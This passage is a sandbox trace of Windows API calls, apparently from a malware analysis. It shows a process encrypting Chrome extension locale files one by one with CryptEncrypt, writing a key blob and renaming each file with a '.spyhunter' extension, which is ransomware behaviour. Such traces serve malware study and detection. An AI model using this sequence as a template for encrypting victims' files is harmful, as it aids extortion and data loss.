SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.561] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf474, lpOverlapped=0x0 | out: lpBuffer=0x25cf4b4*, lpNumberOfBytesWritten=0x25cf474*=0x4, lpOverlapped=0x0) returned 1 [0134.561] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf474, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf474*=0x30, lpOverlapped=0x0) returned 1 [0134.561] CloseHandle (hObject=0xec) returned 1 [0134.561] GetProcessHeap () returned 0x2c0000 [0134.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.561] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.spyhunter") returned 166 [0134.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0134.562] GetProcessHeap () returned 0x2c0000 [0134.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.562] GetProcessHeap () returned 0x2c0000 [0134.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.562] GetProcessHeap () returned 0x2c0000 [0134.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82808 | out: hHeap=0x2c0000) returned 1 [0134.579] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4a8 | out: pbBuffer=0x25cf4a8) returned 1 [0134.579] GetProcessHeap () returned 0x2c0000 [0134.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.579] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4a0*=0x30) returned 1 [0134.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0134.580] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.580] GetProcessHeap () returned 0x2c0000 [0134.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.580] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf464*=0xf2, lpOverlapped=0x0) returned 1 [0134.581] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.581] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf464*=0xf2, lpOverlapped=0x0) returned 1 [0134.581] GetProcessHeap () returned 0x2c0000 [0134.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.581] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.582] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x25cf4a4*, lpNumberOfBytesWritten=0x25cf464*=0x4, lpOverlapped=0x0) returned 1 [0134.582] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf464*=0x30, lpOverlapped=0x0) returned 1 [0134.582] CloseHandle (hObject=0xec) returned 1 [0134.582] GetProcessHeap () returned 0x2c0000 [0134.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.582] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.spyhunter") returned 166 [0134.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0134.583] GetProcessHeap () returned 0x2c0000 [0134.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.583] GetProcessHeap () returned 0x2c0000 [0134.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.583] GetProcessHeap () returned 0x2c0000 [0134.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82808 | out: hHeap=0x2c0000) returned 1 [0134.583] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4a8 | out: pbBuffer=0x25cf4a8) returned 1 [0134.583] GetProcessHeap () returned 0x2c0000 [0134.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.583] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4a0*=0x30) returned 1 [0134.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.584] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0134.584] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.584] GetProcessHeap () returned 0x2c0000 [0134.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.584] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf464*=0x107, lpOverlapped=0x0) returned 1 [0134.585] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffef9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.585] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x107, lpNumberOfBytesWritten=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf464*=0x107, lpOverlapped=0x0) returned 1 [0134.585] GetProcessHeap () returned 0x2c0000 [0134.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.585] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.585] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x25cf4a4*, lpNumberOfBytesWritten=0x25cf464*=0x4, lpOverlapped=0x0) returned 1 [0134.585] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf464, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf464*=0x30, lpOverlapped=0x0) returned 1 [0134.586] CloseHandle (hObject=0xec) returned 1 [0134.586] GetProcessHeap () returned 0x2c0000 [0134.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.586] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.spyhunter") returned 166 [0134.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.spyhunter")) returned 1 [0134.586] GetProcessHeap () returned 0x2c0000 [0134.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.586] GetProcessHeap () returned 0x2c0000 [0134.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.587] GetProcessHeap () returned 0x2c0000 [0134.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f824f8 | out: hHeap=0x2c0000) returned 1 [0134.588] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4a0 | out: pbBuffer=0x25cf4a0) returned 1 [0134.588] GetProcessHeap () returned 0x2c0000 [0134.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.588] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf498*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf498*=0x30) returned 1 [0134.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.588] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0134.588] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.589] GetProcessHeap () returned 0x2c0000 [0134.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.589] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf45c*=0x159, lpOverlapped=0x0) returned 1 [0134.589] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffea7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.589] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x159, lpNumberOfBytesWritten=0x25cf45c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf45c*=0x159, lpOverlapped=0x0) returned 1 [0134.590] GetProcessHeap () returned 0x2c0000 [0134.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.590] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.590] WriteFile (in: hFile=0xec, lpBuffer=0x25cf49c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf45c, lpOverlapped=0x0 | out: lpBuffer=0x25cf49c*, lpNumberOfBytesWritten=0x25cf45c*=0x4, lpOverlapped=0x0) returned 1 [0134.590] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf45c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf45c*=0x30, lpOverlapped=0x0) returned 1 [0134.590] CloseHandle (hObject=0xec) returned 1 [0134.590] GetProcessHeap () returned 0x2c0000 [0134.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.590] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.spyhunter") returned 166 [0134.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0134.591] GetProcessHeap () returned 0x2c0000 [0134.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.591] GetProcessHeap () returned 0x2c0000 [0134.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.591] GetProcessHeap () returned 0x2c0000 [0134.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f821e8 | out: hHeap=0x2c0000) returned 1 [0134.592] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf498 | out: pbBuffer=0x25cf498) returned 1 [0134.592] GetProcessHeap () returned 0x2c0000 [0134.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.592] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf490*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf490*=0x30) returned 1 [0134.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.593] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0134.593] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.593] GetProcessHeap () returned 0x2c0000 [0134.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.593] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf454, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf454*=0x116, lpOverlapped=0x0) returned 1 [0134.594] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.594] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x25cf454, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf454*=0x116, lpOverlapped=0x0) returned 1 [0134.594] GetProcessHeap () returned 0x2c0000 [0134.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.594] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.594] WriteFile (in: hFile=0xec, lpBuffer=0x25cf494*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf454, lpOverlapped=0x0 | out: lpBuffer=0x25cf494*, lpNumberOfBytesWritten=0x25cf454*=0x4, lpOverlapped=0x0) returned 1 [0134.594] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf454, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf454*=0x30, lpOverlapped=0x0) returned 1 [0134.594] CloseHandle (hObject=0xec) returned 1 [0134.595] GetProcessHeap () returned 0x2c0000 [0134.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.595] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.spyhunter") returned 166 [0134.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.spyhunter")) returned 1 [0134.595] GetProcessHeap () returned 0x2c0000 [0134.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.596] GetProcessHeap () returned 0x2c0000 [0134.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.596] GetProcessHeap () returned 0x2c0000 [0134.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81ed8 | out: hHeap=0x2c0000) returned 1 [0134.597] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf490 | out: pbBuffer=0x25cf490) returned 1 [0134.597] GetProcessHeap () returned 0x2c0000 [0134.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.597] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf488*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf488*=0x30) returned 1 [0134.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json") returned 156 [0134.597] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.597] GetProcessHeap () returned 0x2c0000 [0134.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.598] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf44c*=0xfc, lpOverlapped=0x0) returned 1 [0134.598] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.598] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x25cf44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf44c*=0xfc, lpOverlapped=0x0) returned 1 [0134.598] GetProcessHeap () returned 0x2c0000 [0134.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.599] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.599] WriteFile (in: hFile=0xec, lpBuffer=0x25cf48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf44c, lpOverlapped=0x0 | out: lpBuffer=0x25cf48c*, lpNumberOfBytesWritten=0x25cf44c*=0x4, lpOverlapped=0x0) returned 1 [0134.599] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf44c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf44c*=0x30, lpOverlapped=0x0) returned 1 [0134.599] CloseHandle (hObject=0xec) returned 1 [0134.599] GetProcessHeap () returned 0x2c0000 [0134.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.599] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json.spyhunter") returned 166 [0134.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), 